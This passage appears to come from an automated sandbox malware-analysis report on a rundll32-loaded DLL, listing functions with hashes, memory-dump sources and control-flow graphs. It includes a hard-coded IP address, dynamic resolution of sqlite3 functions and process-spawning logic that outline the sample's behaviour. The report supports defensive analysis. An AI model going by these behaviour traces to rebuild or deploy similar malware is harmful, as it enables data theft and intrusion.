                                                                                                  • Instruction Fuzzy Hash: 56A1A273A146D48FD795CF79D8407AC7BE1F389788F548126EA9997B48EB38C205CB00
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00000001800694A0 Relevance: 4.7, APIs: 3, Instructions: 245COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _swprintf_c_lmemcmpmemset
                                                                                                  • String ID:
                                                                                                  • API String ID: 3402243518-0
                                                                                                  • Opcode ID: 0a455fc69ac5555ef9b59789ef52e4ee387e4f6a8b70c8b8c2abc5781c5c4145
                                                                                                  • Instruction ID: 04991b300d753ea99f0ca393c6383c4b0667eaf4037bc8f2b10675d73fc1c3cc
                                                                                                  • Opcode Fuzzy Hash: 0a455fc69ac5555ef9b59789ef52e4ee387e4f6a8b70c8b8c2abc5781c5c4145
                                                                                                  • Instruction Fuzzy Hash: 00B17132605B498AFBE29F65D8403DA73A6F7897C8F248015FF5947A89DF39C649CB00
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 000000018006DFF4 Relevance: 4.1, APIs: 3, Instructions: 329COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memset
                                                                                                  • String ID:
                                                                                                  • API String ID: 2221118986-0
                                                                                                  • Opcode ID: 68b498a9870c5649819b35abb25e3e0006ace2eeaae7a02313a6a2669247841e
                                                                                                  • Instruction ID: a9b31a437ae0bca1bb75622554864018f3139060eba26adcf1d538e86acb2b64
                                                                                                  • Opcode Fuzzy Hash: 68b498a9870c5649819b35abb25e3e0006ace2eeaae7a02313a6a2669247841e
                                                                                                  • Instruction Fuzzy Hash: 0DC15B767143D547EBB58E29E804BAAA792F39D7C8F209118FE5647B84DE39C609CF00
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 000000018006E9FC Relevance: 4.1, APIs: 3, Instructions: 329COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memset
                                                                                                  • String ID:
                                                                                                  • API String ID: 2221118986-0
                                                                                                  • Opcode ID: ec96dad2f3eed84204d703d5306213956bcf14a8c7e54300b208fbf0501b4f4c
                                                                                                  • Instruction ID: d79c931e67a80fc831bd15faf1131e8f54cdd3a742c49a95e34eb15ebc313304
                                                                                                  • Opcode Fuzzy Hash: ec96dad2f3eed84204d703d5306213956bcf14a8c7e54300b208fbf0501b4f4c
                                                                                                  • Instruction Fuzzy Hash: 72C15C767147D447EBB58E29E800BAA7792F39D7C8F20A118FA5643B94DE39D609CF00
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0000000180072A27 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 223COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: 0
                                                                                                  • API String ID: 0-4108050209
                                                                                                  • Opcode ID: 8c794f425371a90e2de2cd336142ec1a125200395d7367a6d3b88ff2349b65e2
                                                                                                  • Instruction ID: 15fc530f1904ddfec9a7962715a48ba0c7a105f1d766ed486868df1d5ef4d4c2
                                                                                                  • Opcode Fuzzy Hash: 8c794f425371a90e2de2cd336142ec1a125200395d7367a6d3b88ff2349b65e2
                                                                                                  • Instruction Fuzzy Hash: 10A19C7221468886EBF6CF28D1443ED67E1F359BD8F549109EE8907789DF3ACA89C740
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 000000018000A7AC Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 40memoryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000180001020), ref: 000000018000A7D5
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: HeapProcess
                                                                                                  • String ID: 171.8.167.45
                                                                                                  • API String ID: 54951025-2723241389
                                                                                                  • Opcode ID: c613ed53884643e468c93d26139486e7ce2b6a222746f2eb2a03ddc5eee8fcaf
                                                                                                  • Instruction ID: 6a4d9e5af3b7fe325f305a351fddb1550b0511be510aa380e1f715ce345513cb
                                                                                                  • Opcode Fuzzy Hash: c613ed53884643e468c93d26139486e7ce2b6a222746f2eb2a03ddc5eee8fcaf
                                                                                                  • Instruction Fuzzy Hash: A9119F30506B4A96FAD28B18FC883D573A9B75E3B4F60C619E4B8862A5DF39C31DC700
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 000000018006E760 Relevance: 2.6, APIs: 2, Instructions: 142COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memmovememset
                                                                                                  • String ID:
                                                                                                  • API String ID: 1288253900-0
                                                                                                  • Opcode ID: a4ba61015edab21776f21e5d3c7e746d690af29fe166f88a08324b0bfea2f5c5
                                                                                                  • Instruction ID: da75a323986b8cca093bd553c2851a72668ac7db1b6b6204200021213a432db4
                                                                                                  • Opcode Fuzzy Hash: a4ba61015edab21776f21e5d3c7e746d690af29fe166f88a08324b0bfea2f5c5
                                                                                                  • Instruction Fuzzy Hash: 155138332083C88BE7A5CF55B84479AB7A5F7897C8F249129FF5643A44EB39C649CB00
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 000000018006F0B4 Relevance: 2.6, APIs: 2, Instructions: 142COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memmovememset
                                                                                                  • String ID:
                                                                                                  • API String ID: 1288253900-0
                                                                                                  • Opcode ID: b98635a0569bbb7a855719908571297cbe41cd56ce58496ddbcbdb8ffdd2d2bd
                                                                                                  • Instruction ID: 35c224199bfa7a48eec0e2752ffc87f067f2fb1608c0cc96f0c16eec6be2b2a8
                                                                                                  • Opcode Fuzzy Hash: b98635a0569bbb7a855719908571297cbe41cd56ce58496ddbcbdb8ffdd2d2bd
                                                                                                  • Instruction Fuzzy Hash: 1B51167320838887D3B5CF55F8507AAB7A5F3897C8F249129EB9647B44EB78D649CB00
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00000001800764F0 Relevance: 1.6, Strings: 1, Instructions: 329COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID: 0-3916222277
                                                                                                  • Opcode ID: e34852a907321b2c0a310d6cd3ff2b21c578a08cefc5c87ec14e93545dda5b93
                                                                                                  • Instruction ID: d948c05783dfcc8f414146daf0bc33694b5aab0ea18eb2405acab33e08474a3f
                                                                                                  • Opcode Fuzzy Hash: e34852a907321b2c0a310d6cd3ff2b21c578a08cefc5c87ec14e93545dda5b93
                                                                                                  • Instruction Fuzzy Hash: 28C10072B156988BEB96CF19E0447A9B791F388BC0F44C125EF4A43794DB3DD948CB00
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00000001800072A8 Relevance: 1.5, APIs: 1, Instructions: 33comCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CreateInstance
                                                                                                  • String ID:
                                                                                                  • API String ID: 542301482-0
                                                                                                  • Opcode ID: 9ba50c07b379dcee6a9a5179895c46778ea5610e92a9fedb800ebdaca9c7ea9a
                                                                                                  • Instruction ID: 6ec33ab1fa450f55db5ffdc818d68adc5a85fbeb1e267d9be7ac50433cc14072
                                                                                                  • Opcode Fuzzy Hash: 9ba50c07b379dcee6a9a5179895c46778ea5610e92a9fedb800ebdaca9c7ea9a
                                                                                                  • Instruction Fuzzy Hash: 32014B36704A4582EB52CF25E850399B3B1F398BC8F54C121EB9D43A28DF39CA5AC700
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 000000018006A304 Relevance: 1.5, APIs: 1, Instructions: 12timeCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetSystemTimeAsFileTime.KERNEL32(?,?,00000000,000000018006890E), ref: 000000018006A312
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Time$FileSystem
                                                                                                  • String ID:
                                                                                                  • API String ID: 2086374402-0
                                                                                                  • Opcode ID: 9d9455a43dc74bf51e2091ade6c5ea1ecea413f883736bedd6ba7ec65b18e945
                                                                                                  • Instruction ID: 08dfbfac3cec6c5864c5a16d6947d107670323fc72f789c1d02ea2cbe503142f
                                                                                                  • Opcode Fuzzy Hash: 9d9455a43dc74bf51e2091ade6c5ea1ecea413f883736bedd6ba7ec65b18e945
                                                                                                  • Instruction Fuzzy Hash: 03D0C976A36544CBDB81CF65E880A99B7E0F79CB10F04A021FA5687718E63CC999CF00
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 000000018006A2C8 Relevance: 1.5, APIs: 1, Instructions: 11COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ControlDevice
                                                                                                  • String ID:
                                                                                                  • API String ID: 2352790924-0
                                                                                                  • Opcode ID: a66e1d163aca22c0d64387c7a093102cf96f82ef91a8c2df69456084ab1fc6cd
                                                                                                  • Instruction ID: 1e54cb40d621f6ee58c2f67f74a10768d1db0efbd2ae079103c51a30650bf8b3
                                                                                                  • Opcode Fuzzy Hash: a66e1d163aca22c0d64387c7a093102cf96f82ef91a8c2df69456084ab1fc6cd
                                                                                                  • Instruction Fuzzy Hash: 68D04276928B84CBD6A09B18F48430AB7A0F388794F501215EBCD46B29DB3CC2558F04
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 000000018006C470 Relevance: .7, Instructions: 683COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 177f8ee2743f692e36716a2a554997d0467f8c68d6d750fb2c00205cb33cda91
                                                                                                  • Instruction ID: 8b502c5acc43c6004b24afd0fd0336b4788e737aa2c0bff6db02d3fa280909ba
                                                                                                  • Opcode Fuzzy Hash: 177f8ee2743f692e36716a2a554997d0467f8c68d6d750fb2c00205cb33cda91
                                                                                                  • Instruction Fuzzy Hash: 312272B7F384204BD31DCB69EC52FA936A2B75434C749A02CAA17D3F44EA3DEA158644
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 000000018006D3D4 Relevance: .2, Instructions: 150COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 0d4070d62dad6fb19221950d339e204551eb2b97ff41e5b997223ba163090b91
                                                                                                  • Instruction ID: 12f268bea92222b424f458ad524a46b1b1c1500a46f54a4292c27c4605e25c5b
                                                                                                  • Opcode Fuzzy Hash: 0d4070d62dad6fb19221950d339e204551eb2b97ff41e5b997223ba163090b91
                                                                                                  • Instruction Fuzzy Hash: 5E51AC737206448BE758CF3DE845BAD3761F39C38CB545225EA26A7F49DB38E9428B00
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0000000180060FE0 Relevance: 59.6, APIs: 17, Strings: 17, Instructions: 126libraryloaderCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 1197 180060fe0-180060ff2 1198 180060ff4-180060ffd 1197->1198 1199 180061002-180061017 call 180065f9c 1197->1199 1200 180061208-180061212 1198->1200 1203 180061206 1199->1203 1204 18006101d-180061034 GetProcAddress 1199->1204 1203->1200 1204->1203 1205 18006103a-180061051 GetProcAddress 1204->1205 1205->1203 1206 180061057-18006106e GetProcAddress 1205->1206 1206->1203 1207 180061074-18006108b GetProcAddress 1206->1207 1207->1203 1208 180061091-1800610a8 GetProcAddress 1207->1208 1208->1203 1209 1800610ae-1800610c5 GetProcAddress 1208->1209 1209->1203 1210 1800610cb-1800610e2 GetProcAddress 1209->1210 1210->1203 1211 1800610e8-1800610ff GetProcAddress 1210->1211 1211->1203 1212 180061105-18006111c GetProcAddress 1211->1212 1212->1203 1213 180061122-180061139 GetProcAddress 1212->1213 1213->1203 1214 18006113f-180061156 GetProcAddress 1213->1214 1214->1203 1215 18006115c-180061173 GetProcAddress 1214->1215 1215->1203 1216 180061179-180061190 GetProcAddress 1215->1216 1216->1203 1217 180061192-1800611a9 GetProcAddress 1216->1217 1217->1203 1218 1800611ab-1800611c5 GetProcAddress 1217->1218 1218->1203 1219 1800611c7-1800611e1 GetProcAddress 1218->1219 1219->1203 1220 1800611e3-1800611fd GetProcAddress 1219->1220 1220->1203 1221 1800611ff-180061204 1220->1221 1221->1200
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AddressProc
                                                                                                  • String ID: sqlite3_bind_blob$sqlite3_bind_int$sqlite3_bind_int64$sqlite3_bind_parameter_index$sqlite3_bind_text16$sqlite3_close$sqlite3_column_blob$sqlite3_column_bytes$sqlite3_column_int$sqlite3_column_int64$sqlite3_column_text16$sqlite3_exec$sqlite3_finalize$sqlite3_open16$sqlite3_prepare16_v2$sqlite3_reset$sqlite3_step
                                                                                                  • API String ID: 190572456-2634604785
                                                                                                  • Opcode ID: c6900063e6f1f58e840ab128dafbd2c95afe69325bb9c3ee8f7ad832e163feb1
                                                                                                  • Instruction ID: 5824c6e44f34b1b970dc4f09c8d16c86c5da5fb83a6df47551891ccc5cd06f94
                                                                                                  • Opcode Fuzzy Hash: c6900063e6f1f58e840ab128dafbd2c95afe69325bb9c3ee8f7ad832e163feb1
                                                                                                  • Instruction Fuzzy Hash: D351A271201F4EA5EF968BA4E8913D833A1FB4CBD7F19D125A92D46364EF38C698C710
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 000000018004D480 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 330processsynchronizationthreadCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 2841 18004d480-18004d4fd GetModuleFileNameW PathAppendW call 18000a354 2844 18004d503 PathFileExistsW 2841->2844 2845 18004d4ff-18004d501 2841->2845 2846 18004d509-18004d50b 2844->2846 2845->2846 2848 18004d561-18004d568 call 180018e8c 2846->2848 2849 18004d50d-18004d547 GetModuleFileNameW PathAppendW call 18000a354 2846->2849 2854 18004d577-18004d5b6 call 180005348 call 18000cf30 call 18004ca9c 2848->2854 2855 18004d56a-18004d575 call 180065ee4 2848->2855 2856 18004d54d PathFileExistsW 2849->2856 2857 18004d549-18004d54b 2849->2857 2872 18004d8d4-18004d8eb 2854->2872 2873 18004d5bc-18004d5cc _mbsstr 2854->2873 2855->2854 2862 18004d557-18004d55c 2855->2862 2858 18004d553-18004d555 2856->2858 2857->2858 2858->2848 2858->2862 2865 18004d918-18004d93f call 1800782d0 2862->2865 2875 18004d8f7-18004d90b 2872->2875 2876 18004d8ed-18004d8f6 2872->2876 2873->2872 2874 18004d5d2-18004d5d6 2873->2874 2874->2872 2877 18004d5dc-18004d62e call 18004e2d8 call 180045e18 2874->2877 2878 18004d916 2875->2878 2879 18004d90d-18004d910 2875->2879 2876->2875 2885 18004d630-18004d633 2877->2885 2886 18004d639-18004d64c _mbsrchr 2877->2886 2878->2865 2879->2878 2885->2886 2887 18004d8b2-18004d8c6 2886->2887 2888 18004d652-18004d656 2886->2888 2889 18004d8c8-18004d8d1 2887->2889 2890 18004d8d2 2887->2890 2888->2887 2891 18004d65c-18004d691 call 18004e240 call 180045e18 2888->2891 2889->2890 2890->2875 2897 18004d693-18004d696 2891->2897 2898 18004d69c-18004d726 call 1800444b0 call 18001a168 memset CreateProcessW 2891->2898 2897->2898 2903 18004d728-18004d72f 2898->2903 2904 18004d78f-18004d7aa ResumeThread WaitForSingleObject 2898->2904 2907 18004d737-18004d73e 2903->2907 2908 18004d731 CloseHandle 2903->2908 2905 18004d7f0-18004d805 GetExitCodeProcess 2904->2905 2906 18004d7ac-18004d7b3 2904->2906 2909 18004d807-18004d80e 2905->2909 2910 18004d84b-18004d856 2905->2910 2911 18004d7b5 CloseHandle 2906->2911 2912 18004d7bb-18004d7c2 2906->2912 2913 18004d747-18004d75b 2907->2913 2914 18004d740-18004d746 CloseHandle 2907->2914 2908->2907 2915 18004d816-18004d81d 2909->2915 2916 18004d810 CloseHandle 2909->2916 2919 18004d858 CloseHandle 2910->2919 2920 18004d85e-18004d865 2910->2920 2911->2912 2917 18004d7c4-18004d7ca CloseHandle 2912->2917 2918 18004d7cb-18004d7df 2912->2918 2921 18004d767-18004d77b 2913->2921 2922 18004d75d-18004d766 2913->2922 2914->2913 2924 18004d826-18004d83a 2915->2924 2925 18004d81f-18004d825 CloseHandle 2915->2925 2916->2915 2917->2918 2926 18004d7e1-18004d7ea 2918->2926 2927 18004d7eb 2918->2927 2919->2920 2928 18004d867-18004d86d CloseHandle 2920->2928 2929 18004d86e-18004d882 2920->2929 2921->2862 2923 18004d781-18004d78a 2921->2923 2922->2921 2923->2862 2931 